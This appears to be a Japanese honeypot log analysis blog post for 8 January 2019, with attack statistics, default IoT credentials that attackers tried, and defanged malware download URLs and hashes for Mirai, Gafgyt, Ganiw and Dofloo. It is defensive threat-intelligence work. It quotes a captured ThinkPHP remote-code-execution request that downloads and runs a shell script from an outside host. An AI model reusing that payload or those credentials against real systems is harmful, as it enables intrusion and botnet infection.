ハニーポット観察日記(2019/01/08) 「GaniwやDoflooを観測」
はじめに
こんにちは。cute_otterです。
今日も投稿が遅れてしまいました。すみません。
Cowrie
ハニーポット「Cowrie」で2019/01/08 (火) 00:00~23:59 UTC(運用57日目)に取得したログの簡易分析です。
概況
- 集計期間 : 2019/01/08 (火) 00:00~23:59 UTC
- 総イベント件数 : 627,008 件 (前日比 -663,176 件)
- コマンド実行成功 : 261,401 件 (前日比 -316,157 件)
- コマンド入力 : 210,228 件 (前日比 -237,119 件)
- ファイルダウンロード成功 : 39,805 件 (前日比 -49,526 件)
- 新しいコネクション : 28,953 件 (前日比 -6,389 件)
- セッションクローズ : 28,949 件 (前日比 -6,392 件)
- コマンド実行失敗 : 12,432 件 (前日比 -21,637 件)
- ログイン成功 : 9,957 件 (前日比 -6,611 件)
- 外部へのTCP/IPリクエストの送出 : 9,236 件 (前日比 -689 件)
- Cowrieによってエミュレートされたアーキテクチャ : 5,666 件 (前日比 -6,398 件)
- TTYログ取得終了 : 5,666 件 (前日比 -6,398 件)
- クライアントのSSHバージョン : 4,639 件 (前日比 -207 件)
- SSH鍵交換 : 4,632 件 (前日比 -191 件)
- ファイルダウンロード失敗 : 4,084 件 (前日比 -3,737 件)
- 外部へのTCP/IPデータの送出 : 943 件 (前日比 -498 件)
- ログイン失敗 : 407 件 (前日比 -1,228 件)
- ターミナルサイズ : 6 件 (前日比 +5 件)
- クライアントの環境設定 : 4 件 (前日比 -4 件)
- ログイン試行件数 : 10,364 件 (前日比 -7,839 件)
- SSHコネクション件数 : 13,300 件 (前日比 -193 件)
- Telnetコネクション件数 : 15,653 件 (前日比 -6,196 件)
- ユニークIPアドレス件数 : 440 件 (前日比 -218 件)
- アクセス元の国数 : 56 カ国 (前日比 -17 件)
- TTY件数 : 5,666 件 (前日比 -6,398 件)
特徴
- 総イベント件数が大幅に減少(半減)
- 前日より66万3,000件ほど減少
- ログイン試行件数が減少
- 前日より7,800件ほど減少
- Telnetコネクション件数が減少
- 前日より6,200件ほど減少
- 前日に引き続きアメリカからのアクセス件数が50万件を超えた
- 普段あまりダウンロードされないGaniwやDoflooがダウンロードされた
ダッシュボード
ダッシュボードは以下の通りです。
国別のアクセス件数
国別のアクセス件数の変遷は以下の通りです。
続いて、国別のアクセス件数(上位20位)は以下の通りです。
順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | United States | 532,269 | 1. | 617,785 | -85,516 | - |
2. | Italy | 46,275 | 2. | 419,002 | -372,727 | - |
3. | United Kingdom | 18,609 | 3. | 46,134 | -27,525 | - |
4. | Ireland | 13,184 | 11. | 13,850 | -666 | - |
5. | Singapore | 4,958 | 14. | 4,884 | +74 | - |
6. | Germany | 3,442 | 17. | 2,639 | +803 | - |
7. | Latvia | 2,529 | 20. | 1,003 | +1,526 | - |
8. | Russia | 1,129 | 6. | 21,617 | -20,488 | - |
9. | Vietnam | 781 | 5. | 21,960 | -21,179 | - |
10. | China | 726 | 4. | 28,190 | -27,464 | - |
11. | Romania | 660 | 22. | 802 | -142 | - |
12. | Unknown | 539 | 69. | 5 | +534 | 識別不能 |
13. | Netherlands | 357 | 15. | 2,780 | -2,423 | - |
14. | Brazil | 202 | 24. | 718 | -516 | - |
15. | France | 195 | 10. | 18,333 | -18,138 | - |
16. | Egypt | 169 | 53. | 41 | +128 | - |
17. | Republic of Korea | 126 | 7. | 19,956 | -19,830 | - |
18. | Taiwan | 85 | 29. | 403 | -318 | - |
19. | Switzerland | 71 | 41. | 130 | -59 | - |
20. | India | 66 | 19. | 1,010 | -944 | - |
- 1時と23時に
イタリア
からのアクセス件数が急増しました。また、20時にラトビアからのアクセス件数が急増しました。それ以外の時間帯のアクセス件数は落ち着いていました。 イタリア
からのアクセス件数が前日より37万件ほど減少し、46,275件となりました。イタリア
からのアクセス件数のうち99.2%が1時と23時に集中していました。
- アメリカからのアクセス件数が前日より8万件ほど減少し、532,269件となりました。
ラトビア
からのアクセス件数が前日より1,500件ほど増加し、2,529件となりました。ラトビア
からのアクセスのうち63.7%が20時に集中していました。
イタリアからのアクセス件数の変遷
イタリアからのアクセス件数の変遷(2018/12/24~2019/01/08)は以下の通りです。
2018/12/26から件数が増加し始め、2018/12/28に、一時的に件数が減少しました。
しかし、2018/12/29から再び件数が増加し始め、2018/12/30~2019/01/01にかけて、毎日30万件以上のアクセスがありました。
2019/01/02には件数が大幅に減少し、430件となりましたが、2019/01/03から再び増加し始め、2019/01/04には327,194件となりました。
2019/01/05は8万件ほど減少しましたが、2019/01/06には525,601件となり、過去最大となりました。それ以降、件数は減少し、2019/01/09には46,275件となりました。
国別のログイン試行
国別のログイン試行の件数(上位20位)は以下の通りです。
順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | United States | 4,836 | 1. | 6,063 | -1,227 | - |
2. | United Kingdom | 2,276 | 3. | 2,911 | -635 | - |
3. | Ireland | 1,908 | 4. | 1,909 | -1 | - |
4. | Italy | 434 | 2. | 3,848 | -3,414 | - |
5. | Russia | 148 | 6. | 457 | -309 | - |
6. | Germany | 120 | 15. | 64 | +56 | - |
7. | Singapore | 117 | 14. | 114 | +3 | - |
8. | China | 94 | 5. | 473 | -379 | - |
9. | Vietnam | 67 | 9. | 334 | -267 | - |
10. | Latvia | 56 | 21. | 20 | +36 | - |
11. | Netherlands | 53 | 17. | 47 | +6 | - |
12. | Republic of Korea | 37 | 7. | 364 | -327 | - |
13. | France | 35 | 8. | 334 | -299 | - |
14. | Taiwan | 33 | 28. | 10 | +23 | - |
15. | Romania | 19 | 26. | 12 | +7 | - |
16. | Egypt | 14 | 40. | 4 | +10 | - |
17. | Brazil | 13 | 19. | 34 | -21 | - |
18. | Poland | 10 | 25. | 12 | -2 | - |
19. | Indonesia | 10 | 23. | 16 | -6 | - |
20. | India | 8 | 18. | 40 | -32 | - |
イタリア
からのログイン試行件数が前日より3,400件ほど減少し、434件となりましたアメリカ
からのログイン試行件数が前日より1,200件ほど減少し、4,836件となりました。
ログイン試行で使用されたユーザ名とパスワード
ログイン試行の際に使用されたユーザ名とパスワードの組み合わせ(上位20位)は以下の通りです。
順位 | ユーザ名 | パスワード | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|---|
1. | admin | admin | 4,374 | 1. | 4,610 | -236 | - |
2. | root | (空欄) | 347 | 7. | 354 | -7 | - |
3. | root | vizxv | 277 | 8. | 287 | -10 | Zhejiang Dahua Technology製のカメラを狙ったものと思われる(参照) |
4. | user | user | 246 | 9. | 286 | -40 | - |
5. | root | 666666 | 245 | 10. | 265 | -20 | Zhejiang Dahua Technology製のカメラを狙ったものと思われる(参照) |
6. | root | 88888888 | 210 | 2. | 1,565 | -1,355 | - |
7. | root | 888888 | 207 | 11. | 253 | -46 | Zhejiang Dahua Technology製のDVRを狙ったものと思われる(参照) |
8. | root | system | 204 | 13. | 211 | -7 | - |
9. | root | pass | 203 | 12. | 229 | -26 | - |
10. | root | 123456 | 192 | 14. | 210 | -18 | - |
11. | root | default | 173 | 16. | 192 | -19 | - |
12. | root | 1234 | 172 | 22. | 157 | +15 | - |
13. | root | 12345 | 166 | 15. | 195 | -29 | - |
14. | support | support | 159 | 17. | 174 | -15 | - |
15. | root | xc3511 | 156 | 20. | 158 | -2 | HiSilicon Technologies製のIPカメラを狙ったものと思われる(参照) |
16. | root | hi3518 | 154 | 19. | 165 | -11 | Xiongmai製のDVRを狙ったものと思われる(参照) |
17. | admin | 4321 | 145 | 21. | 157 | -12 | - |
18. | admin | admin1234 | 137 | 23. | 156 | -19 | - |
19. | root | admin | 133 | 18. | 168 | -35 | - |
20. | root | jvbzd | 116 | 24. | 147 | -31 | Xiongmai製のDVRを狙ったものと思われる(参照) |
admin/admin
の組み合わせのほとんどがイギリス
とアイルランド
からのログイン試行の際に使用されていました。- イギリスが2,192件(4,374件中)、アイルランドが1,906件(4,374件中)でした。
ダウンロードされたファイル
ダウンロードされたファイルは以下の通りです。
※VT : VirusTotal
順位 | ダウンロード元 | MD5 | 検出率(VT) | 件数 | 備考 |
---|---|---|---|---|---|
1. | hxxp://198[.]98[.]62[.]237:80/bins/mirai[.]x86 | 4147e375f325878fe3c3962c3d4ac411 | 37/57 | 2,753 | Mirai |
2. | hxxp://195[.]231[.]0[.]185:80/AB4g5/Josho[.]x86 | aa496313be71695fda7e415999233aa9 | 19/55 | 405 | Mirai |
3. | hxxp://159[.]65[.]190[.]9:80/Binarys/Owari[.]x86 | e01733ef09a20256ada587920dc8de5f | 24/59 | 346 | Mirai |
4. | hxxp://209[.]141[.]43[.]15:80/bins/mirai[.]x86 | 256e4d3c013fe49c6166da2d3ba0c524 | 18/58 | 266 | Mirai |
5. | hxxp://178[.]128[.]214[.]44:80/Kuso69/Akiru[.]x86 | 0f6fa2e22d9de3864e7d60ed6c0cb4b5 | 32/56 | 105 | Gafgyt or Mirai |
6. | hxxp://46[.]183[.]218[.]243:80/33bi/Ares[.]x86 | e68bd8a8712ce1788faa15c9813c00ab | 21/59 | 43 | Mirai |
7. | hxxp://206[.]189[.]188[.]228:80/bins/hoho[.]x86 | 2d46b69ac12c590f01eb65d7b987f365 | 28/59 | 29 | Mirai |
8. | hxxp://167[.]99[.]229[.]112:80/8x868 | a65849fe667dcc5eadd920d427785642 | 20/59 | 26 | Gafgyt |
9. | hxxp://142[.]93[.]97[.]91:80/OwO/Tsunami[.]x86 | ac779f5b95b56eda2e147128852c08a1 | 11/55 | 18 | Mirai |
10. | hxxp://193[.]148[.]69[.]33:80/bins/telnet[.]x86 | f81cb52b13c0ad74247db720ffe5fa36 | 22/60 | 14 | Mirai |
11. | hxxp://138[.]197[.]98[.]242:80/Binarys/Owari[.]x86 | 30eaf115919371ec845d1f09fc40765c | 20/58 | 10 | Mirai |
12. | hxxp://165[.]227[.]104[.]136:80/bins/kowai[.]x86 | 8d3306819d1382f4cdf64a146aafa0eb | 26/58 | 6 | Mirai |
13. | hxxp://209[.]97[.]185[.]168:80/bins/kirai[.]x86 | 3906a2f9b3192664762e3f6eb84f4c18 | 22/58 | 6 | Mirai |
14. | hxxp://bot[.]sunless[.]network:80/sunless[.]x86 | 06a8ac27ca066c417459186e4b3abf0a | 12/59 | 5 | Mirai |
15. | hxxp://139[.]59[.]25[.]145:80/bins/sora[.]x86 | e4ae3f23bbdbcb67b52be4616ffe280b | 21/57 | 5 | Mirai |
16. | hxxp://194[.]36[.]173[.]4:80/vi/x86[.]bushido | 236cc078eb84e9e14f1112a52e74abc9 | 34/58 | 3 | Mirai |
17. | hxxp://217[.]61[.]105[.]126:80/shiro[.]x86 | f06a94f50fb5313850f776bc8d2f73f4 | 9/58 | 2 | Mirai or Gafgyt |
18. | hxxp://167[.]99[.]219[.]142:80/bins/dark[.]x86 | 5f579b8d2ad96c3219865f0a30cf3178 | 21/58 | 2 | Mirai |
19. | hxxp://35[.]235[.]102[.]123:80/bins/telnet[.]x86 | 12747042919cf473e147c0201773bed9 | 22/59 | 2 | Mirai |
20. | hxxp://58[.]218[.]205[.]250:8989/NET86 | ba1cbd4a1b748e36c0ed1d907603cfab | 37/59 | 2 | Ganiw |
21. | hxxp://217[.]61[.]105[.]126:80/shiro[.]x86 | 88bf4c4b7b75ceaf161059419ca15c48 | 10/60 | 2 | Mirai or Gafgyt |
22. | hxxp://58[.]218[.]205[.]250:8989/TFmips | 520e14c83f6063d338072cacf791d51a | 37/58 | 1 | Dofloo |
23. | hxxp://58[.]218[.]205[.]250:8989/TFwrt | c10f8bedf317ac3aedef081abdbec46b | 35/57 | 1 | Dofloo |
24. | hxxp://58[.]218[.]205[.]250:8989/syn[.]sh | 644a81ead1053eae62ff87f52015b69f | 12/58 | 1 | ダウンローダー |
25. | hxxp://58[.]218[.]205[.]250:8989/TFNET3[.]0 | 47108cede9f88417bf4d1194a1a6cfe7 | 38/59 | 1 | Dofloo |
- Mirai(亜種含む)やGafgyt(亜種含む)以外にGaniwやDoflooと思われるマルウェアがダウンロードされていました。
IRCボット
前日観測したIRCボットと思われるファイルを再び観測しました。
Raspberry Piのデフォルトのユーザ名/パスワードであるpi/raspberry
を利用してSSHでログイン後、以下のIRCボットと思われるファイルをSCPで転送し、一旦接続を切断。
その後再度ログインし、IRCボットと思われるファイルを実行しようとしていました。
MD5 : 742f247c9ff393f8daf2e1609f0d9506
Cowrieで取得したログの簡易分析は以上です。
WOWHoneypot
続いて、ハニーポット「WOWHoneypot」で2019/01/08 (火) 00:00~23:59 UTC(運用5日目)に取得したログの簡易分析です。
概況
- 集計期間 : 2019/01/08 (火) 00:00~23:59 UTC
- 総アクセス件数 : 870 件 (前日比 +465 件)
- ユニークIPアドレス件数 : 33 件 (前日比 +6 件)
- アクセス元の国数 : 16 カ国 (前日比 +1 件)
国別のアクセス件数
国別のアクセス件数(上位5位)は以下の通りです。
順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | China | 502 | 1. | 379 | +123 | - |
2. | Republic of Korea | 349 | - | 0 | +349 | - |
3. | Brazil | 4 | 2. | 5 | -1 | - |
4. | United States | 3 | 3. | 3 | +-0 | - |
5. | Japan | 1 | - | 0 | +1 | - |
韓国
からのアクセス件数が大幅に増加しました。
メソッド
メソッドの件数は以下の通りです。
順位 | メソッド | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | POST | 467 | 2. | 157 | +310 | - |
2. | GET | 394 | 1. | 244 | +150 | - |
3. | CONNECT | 6 | 4. | 1 | +5 | - |
4. | PROPFIND | 3 | 3. | 2 | +1 | - |
HTTPバージョン
HTTPバージョンの件数は以下の通りです。
順位 | HTTPバージョン | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | HTTP/1.1 | 867 | 1. | 404 | +463 | - |
2. | HTTP/1.0 | 3 | 2. | 1 | +2 | - |
アクセス先
アクセス先(上位10位+気になったもの)は以下の通りです。
順位 | アクセス先 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | GET /manager/html HTTP/1.1 | 29 | 2. | 10 | +19 | Tomcatの管理ページに対するログイン試行 |
2. | GET / HTTP/1.1 | 16 | 1. | 23 | -7 | トップページへのアクセス |
3. | POST /qq.php HTTP/1.1 | 9 | 3. | 5 | +4 | WebShellの探査 |
4. | POST /1.php HTTP/1.1 | 8 | - | 0 | +8 | WebShellの探査 |
5. | POST /confg.php HTTP/1.1 | 8 | - | 0 | +8 | WebShellの探査 |
6. | GET /shell.php HTTP/1.1 | 6 | 4. | 4 | +2 | WebShellの探査 |
7. | GET /cmd.php HTTP/1.1 | 6 | 12. | 3 | +3 | WebShellの探査 |
8. | POST /conflg.php HTTP/1.1 | 6 | 6. | 4 | +2 | WebShellの探査 |
9. | POST /test.php HTTP/1.1 | 6 | 93. | 2 | +4 | WebShellの探査 |
10. | GET /phpMyAdmin/index.php HTTP/1.1 | 6 | 121. | 2 | +4 | phpMyAdminの探査 |
... | ... | ... | ... | ... | ... | ... |
27. | CONNECT 133[.]130 [.] 126 [.] 119:43 HTTP/1.1 | 3 | 179. | 1 | +2 | オープンプロキシの探査 |
28. | PROPFIND / HTTP/1.1 | 3 | 15. | 2 | +1 | Microsoft IIS 6.0の脆弱性CVE-2017-7269を狙った攻撃 |
... | ... | ... | ... | ... | ... | ... |
312. | GET hxxp://www[.]123cha[.]com HTTP/1.1 | 1 | - | 0 | +1 | オープンプロキシの探査 |
313. | CONNECT www[.]baidu[.]com HTTP/1.1 | 1 | - | 0 | +1 | オープンプロキシの探査 |
314. | GET hxxp://api[.]ipify[.]org/ HTTP/1.1 | 1 | - | 0 | +1 | オープンプロキシの探査 |
315. | CONNECT cn[.]bing[.]com:443 HTTP/1.1 | 1 | - | 0 | +1 | オープンプロキシの探査 |
316. | GET hxxp://www[.]123cha[.]com/ HTTP/1.1 | 1 | - | 0 | +1 | オープンプロキシの探査 |
317. | GET hxxp://www[.]ip[.]cn/ HTTP/1.1 | 1 | - | 0 | +1 | オープンプロキシの探査 |
318. | CONNECT www[.]baidu[.]com:443 HTTP/1.1 | 1 | - | 0 | +1 | オープンプロキシの探査 |
319. | GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20hxxp://167[.]99[.]219[.]142/ex[.]sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1 | 1 | - | 0 | +1 | ThinkPHPフレームワークの脆弱性(RCE)を狙った攻撃(参照) User-AgentはSefa でした。 |
- 前日から不正中継とみられるアクセスが増加しています。
WOWHoneypotで取得したログの簡易分析は以上です。